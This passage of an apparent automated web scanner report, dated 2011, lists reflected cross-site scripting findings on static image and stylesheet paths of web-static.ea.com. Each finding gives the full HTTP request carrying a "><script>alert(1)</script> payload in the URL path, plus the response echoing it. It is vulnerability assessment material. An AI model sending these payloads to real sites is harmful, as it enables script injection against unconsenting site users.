Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:45 GMT
Date: Fri, 24 Jun 2011 13:43:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/18290"><script>alert(1)</script>dd234103871" />
...[SNIP]...
4.109. http://web-static.ea.com/us/portal/css/layout.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/layout.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 390e9"><script>alert(1)</script>ff23a62e26f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/390e9"><script>alert(1)</script>ff23a62e26f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/390e9"><script>alert(1)</script>ff23a62e26f" />
...[SNIP]...
4.110. http://web-static.ea.com/us/portal/css/localized.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/localized.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda98"><script>alert(1)</script>e79b13c4c5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/fda98"><script>alert(1)</script>e79b13c4c5b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:14 GMT
Date: Fri, 24 Jun 2011 14:09:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/fda98"><script>alert(1)</script>e79b13c4c5b" />
...[SNIP]...
4.111. http://web-static.ea.com/us/portal/css/typography.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/typography.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85bff"><script>alert(1)</script>152fb70807f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/85bff"><script>alert(1)</script>152fb70807f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/85bff"><script>alert(1)</script>152fb70807f" />
...[SNIP]...
4.112. http://web-static.ea.com/us/portal/images/TrustELogo.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/TrustELogo.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16bd3"><script>alert(1)</script>ed9411e988f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/16bd3"><script>alert(1)</script>ed9411e988f?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:18 GMT
Date: Fri, 24 Jun 2011 14:09:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/16bd3"><script>alert(1)</script>ed9411e988f" />
...[SNIP]...
4.113. http://web-static.ea.com/us/portal/images/flag_icons/us.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/flag_icons/us.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8205"><script>alert(1)</script>a49f6911d8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/flag_icons/f8205"><script>alert(1)</script>a49f6911d8e?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/flag_icons/f8205"><script>alert(1)</script>a49f6911d8e" />
...[SNIP]...
4.114. http://web-static.ea.com/us/portal/images/icon_downloads.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_downloads.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a513d"><script>alert(1)</script>eb712656cf2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/a513d"><script>alert(1)</script>eb712656cf2?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/a513d"><script>alert(1)</script>eb712656cf2" />
...[SNIP]...
4.115. http://web-static.ea.com/us/portal/images/icon_music.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_music.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26c9"><script>alert(1)</script>c1203a90d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/e26c9"><script>alert(1)</script>c1203a90d25?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/e26c9"><script>alert(1)</script>c1203a90d25" />
...[SNIP]...
4.116. http://web-static.ea.com/us/portal/images/icon_photo.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_photo.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1705"><script>alert(1)</script>a5dc3816470 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/c1705"><script>alert(1)</script>a5dc3816470?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30482
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/c1705"><script>alert(1)</script>a5dc3816470" />
...[SNIP]...
4.117. http://web-static.ea.com/us/portal/images/icon_video.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icon_video.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b756"><script>alert(1)</script>da9a57f928c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/1b756"><script>alert(1)</script>da9a57f928c?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30483
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/1b756"><script>alert(1)</script>da9a57f928c" />
...[SNIP]...
4.118. http://web-static.ea.com/us/portal/images/icons/blog-icon.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/blog-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddaf9"><script>alert(1)</script>086cce64b98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/ddaf9"><script>alert(1)</script>086cce64b98?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30488
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:50 GMT
Date: Fri, 24 Jun 2011 13:43:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/ddaf9"><script>alert(1)</script>086cce64b98" />
...[SNIP]...
4.119. http://web-static.ea.com/us/portal/images/icons/forum-icon.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/forum-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d16"><script>alert(1)</script>80d22155cec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/70d16"><script>alert(1)</script>80d22155cec?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/70d16"><script>alert(1)</script>80d22155cec" />
...[SNIP]...
4.120. http://web-static.ea.com/us/portal/images/icons/podcast-icon.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/podcast-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed389"><script>alert(1)</script>c998434f3c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/ed389"><script>alert(1)</script>c998434f3c9?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30488
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:52 GMT
Date: Fri, 24 Jun 2011 13:43:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/ed389"><script>alert(1)</script>c998434f3c9" />
...[SNIP]...
4.121. http://web-static.ea.com/us/portal/images/icons/tips-icon.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/icons/tips-icon.png

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1ca"><script>alert(1)</script>cc885772821 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/icons/3d1ca"><script>alert(1)</script>cc885772821?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/icons/3d1ca"><script>alert(1)</script>cc885772821" />
...[SNIP]...
4.122. http://web-static.ea.com/us/portal/images/site_logos/battlefield.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/battlefield.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f1d5"><script>alert(1)</script>43f94145e0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/7f1d5"><script>alert(1)</script>43f94145e0b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30494
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/images/site_logos/7f1d5"><script>alert(1)</script>43f94145e0b" />
...[SNIP]...
4.123. http://web-static.ea.com/us/portal/images/site_logos/command_conquer.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/images/site_logos/command_conquer.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c75d4"><script>alert(1)</script>0fd901df3a2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/images/site_logos/c75d4"><script>alert(1)</script>0fd901df3a2?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30493
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:19 GMT
Date: Fri, 24 Jun 2011 14:09:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
